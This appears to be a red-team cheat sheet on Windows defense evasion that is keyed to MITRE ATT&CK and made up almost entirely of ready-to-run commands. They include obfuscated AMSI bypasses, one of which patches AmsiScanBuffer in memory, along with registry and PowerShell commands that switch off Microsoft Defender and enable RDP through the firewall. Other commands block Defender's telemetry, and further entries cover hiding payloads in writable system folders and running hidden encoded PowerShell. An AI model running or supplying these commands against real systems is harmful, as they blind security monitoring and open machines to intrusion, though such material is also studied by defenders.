Defense Evasion

The adversary is trying to avoid being detected. https://attack.mitre.org/tactics/TA0005/

Firewall Modification

Allowing RDP

PowerShell

Set-itemproperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -value 0
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -value 1
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

Windows Commands

reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh advfirewall set rule group="remote administration" new enable="yes"
netsh advfirewall firewall set rule group="remote administration" new enable=yes
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes profile=domain
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes profile=private
netsh firewall add portopening TCP 3389 "Remote Desktop"
netsh firewall set service RemoteDesktop enable
netsh firewall set service RemoteDesktop enable profile=ALL
netsh firewall set service RemoteAdmin enable
sc config TermService start= auto
net start Termservice

AMSI Bypasses

A classic resource: https://amsi.fail/

[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
SeT-Item ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( TYpE ) ; ( Get-varIABLE ( ('1Q'+'2U') +'zX' ) -VaL )."AssEmbly"."GETTYPe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."getfiElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,' ))."sETVaLUE"( ${nULl},${tRuE} );
$fzxhw = @" using System; using System.Runtime.InteropServices; public class fzxhw { [DllImport("kernel32")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); [DllImport("kernel32")] public static extern IntPtr LoadLibrary(string name); [DllImport("kernel32")] public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr vilqbn, uint flNewProtect, out uint lpflOldProtect); } "@
Add-Type $fzxhw
$jvdnuxs = [fzxhw]::LoadLibrary("$(('ämsî'+'.dll').NORMALiZE(chAr+ChaR+ChAr+CHar+cHar) -replace ChAr+ChAR+cHAR+ChaR+chAr+CHar)") $ikbtnz = [fzxhw]::GetProcAddress($jvdnuxs, "$(cHAR+Char+chaR+cHAr+ChAr+Char+cHaR+chAR+chAr+cHAr+CHar+cHaR+CHaR+CHar)") $p = 0 [fzxhw]::VirtualProtect($ikbtnz, [uint32]5, 0x40, [ref]$p) $ovsj = "0xB8" $zahw = "0x57" $cfuu = "0x00" $ukxu = "0x07" $salu = "0x80" $yrkl = "0xC3" $xrnun = [Byte[]] ($ovsj,$zahw,$cfuu,$ukxu,+$salu,+$yrkl) [System.Runtime.InteropServices.Marshal]::Copy($xrnun, 0, $ikbtnz, 6)

Microsoft Defender for Endpoint

Note: Events are cached on the system, so as soon as traffic is established again, the floodgates will open.

Getting Current Status

Get-MpComputerStatus

Adding an Exclusion

Add-MpPreference -ExclusionPath 'C:\windows\temp'

Scanning a File with Defender

C:\Program Files\Windows Defender\MpCmdRun.exe -Scan -ScanType 3 -DisableRemediation -File 'C:\stager.exe'

Disabling Defender

taskkill  /F /IM MSASCuiL.exe

Set-MpPreference -DisableIntrusionPreventionSystem $true `
-DisableRealtimeMonitoring $true -DisableScriptScanning $true `
-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode `
-Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "HideSCAHealth" /t REG_DWORD /d 0x1 /f
REG ADD "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d 0x1 /f
REG DELETE "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "AllowFastServiceStartup" /t REG_DWORD /d 0x0 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "ServiceKeepAlive" /t REG_DWORD /d 0x0 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d 0x1 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t REG_DWORD /d 0x0 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 0x2 /f
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration" /v "NotificationSuppress" /t REG_DWORD /d 0x1 /f

Disable Defender on Reboot\

A BlackByte TTP

powershell -command "$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('VwBpA'+'G4ARA B'+'lAGYA'+'ZQB'+'uAG'+'QA'));Stop-Service -Name $x;Set-Service -StartupType Disabled $x"

Reviewing AppLocker Policies

$a = Get-ApplockerPolicy -effective; $a.rulecollections;

You can also review the AppLocker policies by enumerating the Registry manually:

reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions" /s
reg query "HKEY_LOCAL_Machine\Software\Policies\Microsoft\Windows\SrpV2" /s

Blocking MS Defender Connections

New-NetFirewallRule -DisplayName "Block 443 MsMpEng" -Name "Block 443 MsMpEng" -Direction Outbound -Service WinDefend -Enabled True -RemotePort 443 -Protocol TCP -Action Block
New-NetFirewallRule -DisplayName "Block 443 SenseCncProxy" -Name "Block 443 SenseCncProxy" -Direction Outbound -Program "%ProgramFiles%\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" -RemotePort 443 -Protocol TCP -Action Block
New-NetFirewallRule -DisplayName "Block 443 MsSense" -Name "Block 443 MsSense" -Direction Outbound -Program "%ProgramFiles%\Windows Defender Advanced Threat Protection\MsSense.exe" -RemotePort 443 -Protocol TCP -Action Block

Default Writable Folders for Execution Control Bypass

Try putting your payload in one of the following directories:

C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\drivers\color
C:\Windows\Tasks
C:\windows\tracing 

PowerShell Execution

Nested PowerShell Bypass

powershell.exe -enc [BASE64THIS(powershell.exe -w hidden -c "iex(...)"]>

32-Bit PowerShell Bypass

PowerShell disabled for you? Try running the 32-bit copy of it:

C:\windows\syswow64\windowspowershell\v1.0\powershell whoami

Last updated